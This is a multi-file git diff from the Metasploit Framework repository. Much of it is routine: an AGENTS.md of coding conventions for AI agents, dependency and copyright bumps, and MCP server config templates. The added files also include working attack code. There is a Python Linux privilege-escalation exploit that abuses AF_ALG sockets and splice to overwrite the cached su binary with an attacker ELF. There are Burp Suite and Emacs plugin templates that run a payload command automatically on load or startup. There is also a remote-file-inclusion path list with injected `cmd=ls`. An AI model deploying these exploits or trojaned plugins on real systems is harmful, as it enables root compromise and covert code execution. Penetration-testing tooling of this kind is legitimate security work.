Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
Enabled: true
Lint/BareCheckCodeInNonExploit:
Description: >-
Use Exploit::CheckCode instead of bare CheckCode in non-exploit modules.
Bare CheckCode will raise a NameError at runtime in auxiliary, post, and evasion modules
because CheckCode is defined inside Msf::Exploit which is not in their ancestor chain.
Enabled: true
Include:
- 'modules/auxiliary/**/*'
- 'modules/post/**/*'
- 'modules/evasion/**/*'
+122
View File
@@ -0,0 +1,122 @@
# AI Agent Instructions for Metasploit Framework
## Project Overview
Metasploit Framework is an open-source penetration testing and exploitation framework written in Ruby. It provides infrastructure for developing, testing, and executing exploit code against remote targets.
## Project Structure
- `modules/` — Metasploit modules (exploits, auxiliary, post, payloads, encoders, evasion, nops)
- `lib/msf/` — Core framework library code
- `lib/rex/` — Rex (Ruby Exploitation) library
- `lib/metasploit/` — Metasploit namespace libraries
- `data/` — Data files used by modules (wordlists, templates, binaries)
- `spec/` — RSpec test suite
- `tools/` — Developer and operational tools
- `plugins/` — msfconsole plugins
- `scripts/` — Example automation scripts
## Coding Conventions
- Ruby (see `.ruby-version` for the current version). Minimum supported: 3.1+
- Follow the project's `.rubocop.yml` configuration — run `rubocop` on changed files before submitting
- Run `ruby tools/dev/msftidy.rb <module_file_path>` to catch common module issues
- Add `# frozen_string_literal: true` to new files (the RuboCop cop is disabled project-wide for legacy code, but new files should include it)
- No enforced line length limit, but keep code readable
- Use `%q{}` for long multi-line strings (curly braces preferred for module descriptions)
- Multiline block comments are acceptable for embedded code snippets/payloads
- Don't use `get_`/`set_` prefixes for accessor methods in new code
- Method parameter names must be at least 2 characters (exception for well-known crypto abbreviations)
### Module Development
- Prefer writing modules in Ruby. Go and Python modules are accepted, but their external runtimes don't support the full framework API (e.g. network pivoting). Ruby modules do not have this limitation
- Prefer using hash over an array for return values, and use kwargs for reusable APIs for future extensions
- Before writing a new module, check that there is not an existing module or open pull request that already covers the same functionality
- Each module should be in its own file under the appropriate `modules/` subdirectory. In some scenarios adding module actions or targets is preferred.
- Exploits require a `DisclosureDate` field
- Exploits, auxiliary, and post modules require `Notes` with `SideEffects`
- Use the module mixin APIs — don't reinvent the wheel
- Use `create_process(executable, args: [], time_out: 15, opts: {})` instead of the deprecated `cmd_exec` with separate arguments
- License new code with `MSF_LICENSE` (the project default, defined in `lib/msf/core/constants.rb`)
- When overriding `cleanup`, always call `super` to ensure the parent mixin chain cleans up connections and sessions properly
- When possible don't set a default payload (`DefaultOptions` with `'PAYLOAD'`) in modules — let the framework choose the most appropriate payload automatically
- New modules require an associated markdown file in the `documentation/modules` folder with the same structure, including steps to set up the vulnerable environment for testing
- Module descriptions or documentation should list the range of vulnerable versions and the fixed version of the affected software, when known
- `report_service` method called when a service can be reported
- `report_vuln` method called when a vuln can be reported
- When creating a fake account / username use FAKER not `rand_test_alphanumeric`
- Always use `res.get_json_document` to convert an HTTP response to a hash instead of calling `JSON.parse(res.body)`
- If there's only one `ACTION` in the exploit, it can likely be omitted.
- `Msf::Exploit::SQLi` should be used if it's exploiting an SQLi
- All `print_*` calls should start with a capital
- when opening a file, make sure the file exists first
- when checking for a string in a response - will it always be in english?
- Ensure hardcoded strings being regex'ed will be consistent across multiple versions
- Use the TEST-NET-1 range for example / non-routeable IP addresses in unit tests and spec files: `192.0.2.0`. Local/private IPs are fine in module documentation scenarios.
- Use fetch payload instead of command stagers when only options that request the stage are available (i.e. dont use a cmd stager and only allow curl/wget).
- Define bad characters instead of explicitly base-64 encoding payloads
- Use `ARCH_CMD` payloads instead of command stagers when only curl/wget and other download mechanisms would be available
- Dont check the number of sessions at the end of an exploit and report success based on that, not all payloads open sessions
- Dont submit any kind of opaque binary blob, everything must include source code and build instructions
- Dont print host information like `#{ip}:#{port}` because it doesnt handle IPv6 addresses, instead use `#{Rex::Socket.to_authority(ip, port)}`
- Implement a `check` method when possible to allow users to verify vulnerability before exploitation
### Check Methods
- `check` methods must only return `CheckCode` values (e.g. `CheckCode::Vulnerable`, `CheckCode::Safe`) — never raise exceptions or call `fail_with`
- When writing a `check` method, verify it does not produce false positives when run against unrelated software or services
- Prefer using `Rex::Version` for version checks
- Use `fail_with(Failure::UnexpectedReply, '...')` (and other `Failure::*` constants) to bail out of `exploit`/`run` methods — don't use `raise` or bare `return` for error conditions
- `get_version` methods should return a REX version
- `CheckCode::Vulnerable` is only used when the vulnerability has been exploited
- `CheckCode::Appears` is only used when the application's versions has been checked`
- Use specific regular expressions or `res.get_html_document` for version extraction with CSS selectors. Don't use a generic selectors like `href .*` dot star to grab the version, be more precise.
- Do catch exceptions that may be raised and ensure a valid Check Code is returned
- Do research and determine a minimum version where the application is vulnerable, mark prior versions as safe
- Check helper methods that are used by both `#check` and `#exploit` (or `#run`) and make sure there is no condition (exception, return, etc) where `#check` could return something else than CheckCode.
- Prefer `prepend Msf::Exploit::Remote::AutoCheck` over manually calling `check` inside `exploit` — this lets the framework handle check-before-exploit automatically
### Library Code
- When adding complex binary or protocol parsing (e.g. BinData, RASN1, Rex::Struct2), include a code comment linking to the specification or RFC that defines the format being implemented
- Write RSpec tests for any library changes
- Follow [Better Specs](http://www.betterspecs.org/) conventions
- Write YARD documentation for public methods
- Keep PRs focused — small fixes are easier to review
- Any new hash cracking implementations require adding a test hash to `tools/dev/hash_cracker_validator.rb` and ensuring that passes without error
### Testing
- Tests live in `spec/` mirroring the `lib/` structure
- Run tests with: `bundle exec rspec spec/path/to/spec.rb`
### Preferred Libraries
- Use the `RubySMB` library for SMB modules
- Use `Rex::Stopwatch.elapsed_time` to track elapsed time
- Use the `Rex::MIME::Message` class for MIME messages instead of hardcoding XML
- When creating random variable names prefer `Rex::RandomIdentifier::Generator` and specify the runtime language used. This avoids generating langauge keywords that would break the script.
## Common Patterns
- Register options with `register_options` and `register_advanced_options`
- Use `SCREAMING_SNAKE_CASE` option names and `CamelCase` advanced option names
- Use `datastore['OPTION_NAME']` to access module options
- Use `print_status`, `print_good`, `print_error`, `print_warning` for console output
- Use `vprint_*` variants for verbose-only output
- Use `send_request_cgi` for HTTP requests in modules
- Use `connect` / `disconnect` for TCP socket operations
## Before Submitting
- Ensure `rubocop` and `msftidy` pass on any changed files with no new offenses
- Ensure `ruby tools/dev/msftidy_docs.rb <documentation_file>` passes on any changed documentation markdown docs with no new offenses
## What NOT to Do
- Don't submit untested code — all code must be manually verified
- Don't include sensitive information (IPs, credentials, API keys, hashes of credentials) in code or docs
- Don't include more than one module per pull request
- Don't add new scripts to `scripts/` — use post modules instead
- Don't use `pack`/`unpack` with invalid directives (enforced by linter)
+2 -2
View File
@@ -8,14 +8,14 @@ Before we get into the details of contributing code, you should know there are m
- You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new/choose) with detailed information about your issue or idea:
- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
- [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
- [Help fellow users with open issues](https://github.com/rapid7/metasploit-framework/issues). This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
- [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
- [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
## Code Contributions
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. For a detailed reference of our coding conventions, project structure, and preferred patterns, see [AGENTS.md](./AGENTS.md). Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
+1 -1
View File
@@ -1,4 +1,4 @@
Copyright (C) 2006-2025, Rapid7, Inc.
Copyright (C) 2006-2026, Rapid7, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
+2 -1
View File
@@ -53,5 +53,6 @@ group :test do
gem 'allure-rspec'
# Manipulate Time.now in specs
gem 'timecop'
# stub and set expectations on HTTP requests
gem 'webmock', '~> 3.18'
end
+40 -22
View File
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.4.105)
metasploit-framework (6.4.133)
aarch64
abbrev
actionpack (~> 7.2.0)
@@ -42,13 +42,14 @@ PATH
jsobfu
json
lru_redux
mcp (= 0.13.0)
metasm
metasploit-concern
metasploit-credential
metasploit-credential (>= 6.0.21)
metasploit-model
metasploit-payloads (= 2.0.237)
metasploit_data_models (>= 6.0.7)
metasploit_payloads-mettle (= 1.0.45)
metasploit-payloads (= 2.0.245)
metasploit_data_models (>= 6.0.15)
metasploit_payloads-mettle (= 1.0.46)
mqtt
msgpack (~> 1.6.0)
mutex_m
@@ -102,7 +103,7 @@ PATH
rinda
ruby-macho
ruby-mysql
ruby_smb (~> 3.3.15)
ruby_smb (~> 3.3.17)
rubyntlm
rubyzip
sinatra (~> 3.2)
@@ -211,7 +212,7 @@ GEM
bcrypt (3.1.20)
bcrypt_pbkdf (1.1.1)
benchmark (0.4.1)
bigdecimal (3.2.3)
bigdecimal (3.3.1)
bindata (2.4.15)
bootsnap (1.18.4)
msgpack (~> 1.2)
@@ -223,6 +224,9 @@ GEM
concurrent-ruby (1.3.5)
connection_pool (2.5.4)
cookiejar (0.3.4)
crack (1.0.1)
bigdecimal
rexml
crass (1.0.6)
csv (3.3.2)
daemons (1.4.1)
@@ -281,6 +285,7 @@ GEM
gyoku (1.4.0)
builder (>= 2.1.2)
rexml (~> 3.0)
hashdiff (1.2.1)
hashery (2.1.2)
hrr_rb_ssh (0.4.2)
hrr_rb_ssh-ed25519 (0.4.2)
@@ -304,6 +309,9 @@ GEM
jsobfu (0.4.2)
rkelly-remix
json (2.15.1)
json-schema (6.2.0)
addressable (~> 2.8)
bigdecimal (>= 3.1, < 5)
language_server-protocol (3.17.0.5)
license_finder (5.11.1)
bundler
@@ -322,6 +330,8 @@ GEM
crass (~> 1.0.2)
nokogiri (>= 1.12.0)
lru_redux (1.1.0)
mcp (0.13.0)
json-schema (>= 4.1)
memory_profiler (1.1.0)
metasm (1.0.5)
metasploit-concern (5.0.5)
@@ -331,7 +341,7 @@ GEM
mutex_m
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.19)
metasploit-credential (6.0.23)
bigdecimal
csv
drb
@@ -352,18 +362,21 @@ GEM
drb
mutex_m
railties (~> 7.0)
metasploit-payloads (2.0.237)
metasploit_data_models (6.0.9)
activerecord (~> 7.0)
activesupport (~> 7.0)
metasploit-payloads (2.0.245)
metasploit_data_models (6.0.18)
activerecord (>= 7.0, < 8.1)
activesupport (>= 7.0, < 8.1)
arel-helpers
bigdecimal
drb
metasploit-concern
metasploit-model (>= 3.1)
metasploit-model (>= 5.0.4)
mutex_m
pg
railties (~> 7.0)
railties (>= 7.0, < 8.1)
recog
webrick
metasploit_payloads-mettle (1.0.45)
metasploit_payloads-mettle (1.0.46)
method_source (1.1.0)
mime-types (3.7.0)
logger
@@ -486,16 +499,16 @@ GEM
http-cookie (>= 1.0.2, < 2.0)
mime-types (>= 1.16, < 4.0)
netrc (~> 0.8)
rex-arch (0.1.18)
rex-arch (0.1.20)
rex-text
rex-bin_tools (0.1.10)
rex-bin_tools (0.1.16)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.35)
rex-encoder (0.1.8)
rex-core (0.1.36)
rex-encoder (0.1.10)
metasm
rex-arch
rex-text
@@ -528,7 +541,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.64)
rex-socket (0.1.65)
dnsruby
rex-core
rex-sslscan (0.1.13)
@@ -536,7 +549,7 @@ GEM
rex-socket
rex-text
rex-struct2 (0.1.5)
rex-text (0.2.61)
rex-text (0.2.63)
bigdecimal
rex-zip (0.1.6)
rex-text
@@ -590,7 +603,7 @@ GEM
ruby-progressbar (1.13.0)
ruby-rc4 (0.1.5)
ruby2_keywords (0.0.5)
ruby_smb (3.3.15)
ruby_smb (3.3.17)
bindata (= 2.4.15)
openssl-ccm
openssl-cmac
@@ -646,6 +659,10 @@ GEM
useragent (0.16.11)
warden (1.2.9)
rack (>= 2.0.9)
webmock (3.26.2)
addressable (>= 2.8.0)
crack (>= 0.3.2)
hashdiff (>= 0.4.0, < 2.0.0)
webrick (1.9.1)
websocket-driver (0.7.7)
base64
@@ -696,6 +713,7 @@ DEPENDENCIES
simplecov (= 0.18.2)
test-prof
timecop
webmock (~> 3.18)
yard
BUNDLED WITH
+1 -1
View File
@@ -2,7 +2,7 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Source: https://www.metasploit.com/
Files: *
Copyright: 2006-2025, Rapid7, Inc.
Copyright: 2006-2026, Rapid7, Inc.
License: BSD-3-clause
# The Metasploit Framework is provided under the 3-clause BSD license provided
+18 -13
View File
@@ -27,7 +27,7 @@ base64, 0.3.0, "ruby, Simplified BSD"
bcrypt, 3.1.20, MIT
bcrypt_pbkdf, 1.1.1, MIT
benchmark, 0.4.1, "ruby, Simplified BSD"
bigdecimal, 3.2.3, "ruby, Simplified BSD"
bigdecimal, 3.3.1, "ruby, Simplified BSD"
bindata, 2.4.15, "Simplified BSD"
bootsnap, 1.18.4, MIT
bson, 5.1.1, "Apache 2.0"
@@ -39,6 +39,7 @@ coderay, 1.1.3, MIT
concurrent-ruby, 1.3.5, MIT
connection_pool, 2.5.4, MIT
cookiejar, 0.3.4, "Simplified BSD"
crack, 1.0.1, MIT
crass, 1.0.6, MIT
csv, 3.3.2, "ruby, Simplified BSD"
daemons, 1.4.1, MIT
@@ -71,6 +72,7 @@ forwardable, 1.3.3, "ruby, Simplified BSD"
getoptlong, 0.2.1, "ruby, Simplified BSD"
gssapi, 1.3.1, MIT
gyoku, 1.4.0, MIT
hashdiff, 1.2.1, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.4.2, "Apache 2.0"
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
@@ -85,6 +87,7 @@ irb, 1.15.2, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.15.1, ruby
json-schema, 6.2.0, MIT
language_server-protocol, 3.17.0.5, MIT
license_finder, 5.11.1, MIT
lint_roller, 1.1.0, MIT
@@ -93,15 +96,16 @@ logger, 1.7.0, "ruby, Simplified BSD"
logging, 2.4.0, MIT
loofah, 2.24.1, MIT
lru_redux, 1.1.0, MIT
mcp, 0.13.0, "Apache 2.0"
memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.5, "New BSD"
metasploit-credential, 6.0.19, "New BSD"
metasploit-framework, 6.4.105, "New BSD"
metasploit-credential, 6.0.23, "New BSD"
metasploit-framework, 6.4.133, "New BSD"
metasploit-model, 5.0.4, "New BSD"
metasploit-payloads, 2.0.237, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.9, "New BSD"
metasploit_payloads-mettle, 1.0.45, "3-clause (or ""modified"") BSD"
metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.18, "New BSD"
metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
method_source, 1.1.0, MIT
mime-types, 3.7.0, MIT
mime-types-data, 3.2025.0924, MIT
@@ -166,10 +170,10 @@ regexp_parser, 2.11.3, MIT
reline, 0.6.2, ruby
require_all, 3.0.0, MIT
rest-client, 2.1.0, MIT
rex-arch, 0.1.18, "New BSD"
rex-bin_tools, 0.1.10, "New BSD"
rex-core, 0.1.35, "New BSD"
rex-encoder, 0.1.8, "New BSD"
rex-arch, 0.1.20, "New BSD"
rex-bin_tools, 0.1.16, "New BSD"
rex-core, 0.1.36, "New BSD"
rex-encoder, 0.1.10, "New BSD"
rex-exploitation, 0.1.44, "New BSD"
rex-java, 0.1.8, "New BSD"
rex-mime, 0.1.11, "New BSD"
@@ -179,10 +183,10 @@ rex-powershell, 0.1.103, "New BSD"
rex-random_identifier, 0.1.21, "New BSD"
rex-registry, 0.1.6, "New BSD"
rex-rop_builder, 0.1.6, "New BSD"
rex-socket, 0.1.64, "New BSD"
rex-socket, 0.1.65, "New BSD"
rex-sslscan, 0.1.13, "New BSD"
rex-struct2, 0.1.5, "New BSD"
rex-text, 0.2.61, "New BSD"
rex-text, 0.2.63, "New BSD"
rex-zip, 0.1.6, "New BSD"
rexml, 3.4.1, "Simplified BSD"
rinda, 0.2.0, "ruby, Simplified BSD"
@@ -202,7 +206,7 @@ ruby-prof, 1.7.2, "Simplified BSD"
ruby-progressbar, 1.13.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
ruby_smb, 3.3.15, "New BSD"
ruby_smb, 3.3.17, "New BSD"
rubyntlm, 0.6.5, MIT
rubyzip, 2.4.1, "Simplified BSD"
sawyer, 0.9.2, MIT
@@ -233,6 +237,7 @@ unicode-emoji, 4.1.0, MIT
unix-crypt, 1.3.1, 0BSD
useragent, 0.16.11, MIT
warden, 1.2.9, MIT
webmock, 3.26.2, MIT
webrick, 1.9.1, "ruby, Simplified BSD"
websocket-driver, 0.7.7, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
+33
View File
@@ -0,0 +1,33 @@
# Metasploit RPC API connection (MessagePack)
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true # Automatically start the RPC server if not running (default: true)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
+32
View File
@@ -0,0 +1,32 @@
# Metasploit RPC API connection (JSON-RPC)
msf_api:
type: json-rpc
host: localhost
port: 8081
ssl: true
endpoint: /api/v1/json-rpc
token: YOUR_BEARER_TOKEN_HERE
# auto_start_rpc is not supported for JSON-RPC (only MessagePack)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
+11
View File
@@ -0,0 +1,11 @@
meterpreter
▄▄▄▄ ▒█████ █████▒
▓█████▄ ▒██▒ ██▒▓██ ▒
▒██▒ ▄██▒██░ ██▒▒████ ░
▒██░█▀ ▒██ ██░░▓█▒ ░
░▓█ ▀█▓░ ████▓▒░░▒█░
░▒▓███▀▒░ ▒░▒░▒░ ▒ ░
▒░▒ ░ ░ ▒ ▒░ ░ ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
░ ░ ░ ░ ░ ▒ ░ ░
░ ░ ░ loader
File diff suppressed because one or more lines are too long
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env python3
import os
import socket
import sys
AF_ALG = 38
ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
def check():
if not os.path.exists('/proc/crypto'):
print('[-] /proc/crypto is missing.')
return
try:
s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
except OSError as e:
print('[-] AF_ALG socket family unavailable (' + e.strerror + ').')
return
try:
s.bind(("aead", ALG_NAME))
except OSError as e:
print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + e.strerror + ').')
return
finally:
s.close()
print('[+] The exploit socket has been created, encryption primitives are available.')
return True
if __name__ == '__main__':
if not check():
sys.exit(1)
@@ -0,0 +1,9 @@
import os
import shutil
su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
os.posix_fadvise(su_fd, 0, 0, os.POSIX_FADV_DONTNEED)
finally:
os.close(su_fd)
+56
View File
@@ -0,0 +1,56 @@
#!/usr/bin/env python3
import os
import base64
import shutil
import socket
import sys
import zlib
AF_ALG = 38
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
SOL_ALG = 279
def setup_sock():
sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
op_sock, _ = sock.accept()
return op_sock
def write(op_sock, su_fd, offset, chunk):
op_sock.sendmsg(
[b"A" * 4 + chunk],
[
(SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
(SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b'\x08\x00\x00\x00')
],
32768
)
r, w = os.pipe()
os.splice(su_fd, w, offset + 4, offset_src=0)
os.splice(r, op_sock.fileno(), offset + 4)
try:
op_sock.recv(8 + offset)
except:
pass
su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
except:
print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
sys.exit(os.EX_USAGE)
op_sock = setup_sock()
for i in range(0, len(elf), 4):
write(op_sock, su_fd, i, elf[i:i + 4])
op_sock.close()
os.execvp(su_path, ["su"] + sys.argv[1:])
+9
View File
@@ -0,0 +1,9 @@
# Prerequisites
You'll need `gradle` which can be installed on Kali via `sudo apt-get install gradle`
# Build
1. Build: `gradle clean build`
1. Post build extension location: `build/libs/MetasploitPayloadExtension.jar`
2. Copy the files into the proper location: `cp build/classes/java/main/burp/BurpExtender.class precompiled.class`
+27
View File
@@ -0,0 +1,27 @@
apply plugin: 'java'
repositories {
mavenCentral()
}
dependencies {
// implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13'
implementation 'net.portswigger.burp.extender:burp-extender-api:2.3'
}
sourceSets {
main {
java {
srcDir 'src/main/java'
}
resources {
srcDir 'src/main/resources'
}
}
}
task fatJar(type: Jar) {
baseName = project.name + '-all'
from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } }
with jar
}
Binary file not shown.
@@ -0,0 +1 @@
rootProject.name = 'MetasploitPayloadExtension'
@@ -0,0 +1,96 @@
package burp;
import java.io.File;
import java.io.InputStream;
import java.io.PrintWriter;
import java.nio.charset.StandardCharsets;
import java.util.Scanner;
import java.net.URL;
import java.net.URLClassLoader;
import java.lang.reflect.Method;
public class BurpExtender implements IBurpExtender {
@Override
public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
// Read extension name from resource file and set it
InputStream nameInputStream = getClass().getClassLoader().getResourceAsStream("name.txt");
Scanner nameScanner = new Scanner(nameInputStream, StandardCharsets.UTF_8.name());
String extensionName = nameScanner.useDelimiter("\\A").next().trim();
callbacks.setExtensionName(extensionName);
// Obtain our output and error streams
PrintWriter stdout = new PrintWriter(callbacks.getStdout(), true);
PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true);
// Detect operating system
String os = System.getProperty("os.name").toLowerCase();
Process process;
try {
stdout.println("Initializing extension.");
// Locate command.txt using ClassLoader
InputStream commandInputStream = getClass().getClassLoader().getResourceAsStream("command.txt");
if (commandInputStream != null) {
// Read the command from command.txt
Scanner commandScanner = new Scanner(commandInputStream, StandardCharsets.UTF_8.name());
String command = commandScanner.useDelimiter("\\A").next().trim();
if (os.contains("win")) {
// Create a temporary batch script to avoid line length issues from command line
File tempScript = File.createTempFile("command", ".bat");
tempScript.deleteOnExit(); // Ensure the file is deleted after execution
// Write the command to the script file
try (PrintWriter writer = new PrintWriter(tempScript, StandardCharsets.UTF_8.name())) {
writer.println("@echo off");
writer.println(command); // Write the payload command
}
// Execute the script file
process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", tempScript.getAbsolutePath()});
} else {
// Unix-based systems: Use /bin/bash
process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", command});
}
} else {
// Load burp_extension_pload.jar from resources
InputStream jarInputStream = getClass().getClassLoader().getResourceAsStream("burp_extension_pload.jar");
if (jarInputStream == null) {
throw new Exception("burp_extension_pload.jar not found in resources");
}
// Save the jar to a temporary file
File tempJar = File.createTempFile("burp_extension_pload", ".jar");
tempJar.deleteOnExit();
try (InputStream inputStream = jarInputStream) { // Declare jarInputStream as a resource
java.nio.file.Files.copy(inputStream, tempJar.toPath(), java.nio.file.StandardCopyOption.REPLACE_EXISTING);
}
// Load the jar using URLClassLoader
stdout.println("Loading internal jar");
try (URLClassLoader classLoader = new URLClassLoader(
new URL[]{tempJar.toURI().toURL()},
null // Use null for an isolated class loader
)) {
Class<?> mainClass = classLoader.loadClass("metasploit.Payload");
Method mainMethod = mainClass.getDeclaredMethod("main", String[].class);
mainMethod.invoke(null, (Object) new String[]{});
} catch (ClassNotFoundException e) {
stderr.println("Class not found: " + e.getMessage());
} catch (NoSuchMethodException e) {
stderr.println("Main method not found: " + e.getMessage());
} catch (Exception e) {
stderr.println("Error loading jar file (" + tempJar.toPath() + "): " + e.getMessage());
e.printStackTrace(stderr);
}
}
stdout.println("Finished initializing extension.");
} catch (Exception e) {
stderr.println("Error loading extension: " + e.getMessage());
}
}
}
@@ -0,0 +1 @@
FOOBARBAZ
@@ -0,0 +1 @@
Metasploit Payload Extension
+15
View File
@@ -0,0 +1,15 @@
(defun PLUGIN_NAME--process-sentinel (proc event)
(when (memq (process-status proc) '(exit signal))
(delete-process proc)))
(defun PLUGIN_NAME-run-async ()
(make-process
:name "PLUGIN_NAME"
:buffer nil
:command (list "bash" "-li" "-c" "PAYLOAD_PLACEHOLDER")
:noquery t
:sentinel #'PLUGIN_NAME--process-sentinel))
(add-hook 'emacs-startup-hook #'PLUGIN_NAME-run-async)
(provide 'PLUGIN_NAME)
+2247 -2246
View File
@@ -1,2246 +1,2247 @@
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?
/=XXpathXX
/?_CONFIG[files][functions_page]=XXpathXX
/?npage=-1&content_dir=XXpathXX%00&cmd=ls
/?npage=1&content_dir=XXpathXX%00&cmd=ls
/?show=XXpathXX?
/A-Blog/navigation/donation.php?navigation_start=XXpathXX
/A-Blog/navigation/latestnews.php?navigation_start=XXpathXX?
/A-Blog/navigation/links.php?navigation_start=XXpathXX?
/A-Blog/navigation/search.php?navigation_end=XXpathXX?
/A-Blog/sources/myaccount.php?open_box=XXpathXX?
/ACGVnews/header.php?PathNews=XXpathXX
/ATutor/documentation/common/frame_toc.php?section=XXpathXX
